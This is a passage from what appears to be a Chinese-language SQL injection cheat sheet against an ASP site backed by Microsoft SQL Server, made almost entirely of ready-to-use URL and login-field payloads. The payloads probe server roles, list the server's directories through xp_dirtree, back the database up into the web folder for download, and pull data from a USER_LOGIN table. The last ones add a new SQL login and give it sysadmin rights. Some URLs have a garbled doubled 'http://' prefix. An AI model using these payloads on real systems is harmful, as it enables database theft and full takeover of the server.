.asp?id=1 and 1=(select IS_SRVROLEMEMBER(''securityadmin''));--
语句6:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(''diskadmin''));--
语句7:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(''bulkadmin''));--
语句8:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(''bulkadmin''));--
语句9:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER(''db_owner''));--
把路径写到表中去:
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)-
http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ''c:\''-
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in(''@Inetpub''))-
语句:http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--
语句:http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ''e:\web''--
语句:http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)-
把数据库备份到网页目录:
下载http://http://www.xxxxx.com/down/list.asp?id=1;declare @a sysname; set @a=db_name();backup database @a to disk=''e:\web\down.bak'';--
and%201=(select%20top%201%20name%20from(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc)
and%201=(select%20Top%201%20col_name(object_id(''USER_LOGIN''),1)%20from%20sysobjects) 参看相关表。
and 1=(select%20user_id%20from%20USER_LOGIN)
and%200=(select%20user%20from%20USER_LOGIN%20where%20user>1)
如果可以通过连接符注释掉后面的验证，那么就更有意思了，来看我们能做什么：
a、在用户名位置输入【admin'';exec master.dbo.sp_addlogin Cool;--】,添加一个sql用户
b、在用户名位置输入【admin'';exec master.dbo.sp_password null,123456,Cool;--】,给Cool设置密码为123456
c、在用户名位置输入【admin'';exec master.dbo.sp_addsrvrolemember Cool,sysadmin;--】,给Cool赋予System Administrator权限